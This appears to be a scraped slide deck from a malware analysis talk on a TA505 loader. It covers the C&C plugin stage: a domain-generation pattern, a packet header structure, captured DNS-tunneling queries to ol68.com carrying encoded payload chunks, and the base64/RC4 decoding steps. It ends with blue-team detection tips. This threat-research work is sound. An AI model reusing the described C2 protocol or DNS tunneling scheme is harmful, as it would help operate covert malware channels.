![Page 82: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/82.jpg)
C&C plugin stage
MD5 checksum generating and custom base64 encoding
![Page 83: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/83.jpg)
C&C plugin stage
Domain name generation:
/[a-z]{2}[0-9]{2}.com/
![Page 84: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/84.jpg)
C&C plugin stage
Header packet structure, 0x18 bytes
struct PacketHeader {
DWORD rand; // rand(0xAAAABBBB) + 0x11111111
BYTE num; // sequence number
BYTE zero; // usually zero, unknown
DWORD xored_volume_info; // volume_info ^ rand
DWORD xored_chunks; // chunks ^ rand
DWORD rand; // usually the same rand
};
![Page 85: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/85.jpg)
C&C plugin stage
Hardcoded UDP request structure
![Page 86: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/86.jpg)
C&C plugin stage
X25 DNS request type
![Page 88: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/88.jpg)
C&C plugin stage
70FLQwcAqHfxh-11PlBS0PvQUtD.ol68.com
ivMAAAEAzcW6xIrzAACK8wAA.ol68.com
![Page 89: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/89.jpg)
C&C plugin stage
7ZWPrs2G1tlcONzJnd68Kfb73DYaa0dOB68Dq5djUoy9U
ABYdFhtAeAaTW-
22Lr.1AjwSkBXvVhSlW31sveIvBTvk1TUHtcS6MRj87VIK
kXTlQyFLTcP5Ck0FX-11P.irbmr-
11PhFWVXcPj2BjkAzRWryseAaDlLajqH7kjXjE4Y7fn4RIt-
44LswTTX.BZwPrcF-44LbLn5ZcgT.ySADOwjSjha5-
44L8kgAzvaIeJi.ol68.com
Header
Payload chunk
![Page 90: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/90.jpg)
C&C plugin stage
…
![Page 91: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/91.jpg)
C&C plugin stage
• Get all 6 chunks
• Join them “as is”
• Custom base64 decode
• RC4 decrypt
• Done!
![Page 92: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/92.jpg)
C&C plugin stage
Fu-33S2umvUVm44Ezor-44Lrcw6w-88L-
55E.FoVHKQklUbP97RaFRykL4c1H.ol68.com
Fu-33S2umvUVm44Ezor-44Lrcw6w-88L-
55E.uI6dHQkl-44L7gn2biOnR2l6hdz.ol68.com
![Page 93: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/93.jpg)
C&C plugin stage
… custom base64 decode -> MD5 hash of the payload
Why twice? …
![Page 94: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/94.jpg)
C&C plugin stage
Payload in the response
Header Payload
![Page 95: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/95.jpg)
C&C plugin stage
Malware config
MD5 checksum
again
![Page 96: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/96.jpg)
Conclusion
In the end…
![Page 97: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/97.jpg)
Conclusion
Similar one in Twitter
https://twitter.com/vk_intel/
status/117726976729780
6337
![Page 98: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/98.jpg)
Conclusion
Proofpoint about Snatch
https://www.proofpoint.com/us/th
reat-insight/post/ta505-
distributes-new-sdbbot-remote-
access-trojan-get2-downloader
![Page 99: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/99.jpg)
Conclusion
@tildedennis about
Snatch
https://github.com/tildedennis/ma
lware/blob/master/snatch_loader
/decrypt_cfg.py
![Page 100: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/100.jpg)
Conclusion
The same key generation
![Page 101: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/101.jpg)
Conclusion
Takeaways or blue team tips
• Everybody love tasks
• PowerShell/WScript processes and .ps1/.js files on disk
• msiexec and suspended processes
• Integrity control of system libraries (splicing is still alive)
![Page 102: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/102.jpg)
Conclusion
Takeaways or blue team tips
• Control an execution flow? (ROP gadgets -> kBouncer -> JOP)
• Unusual request types and DNS tunneling
• A lightweight and qualitative trojan downloader is a stable trend
APT != targeted attack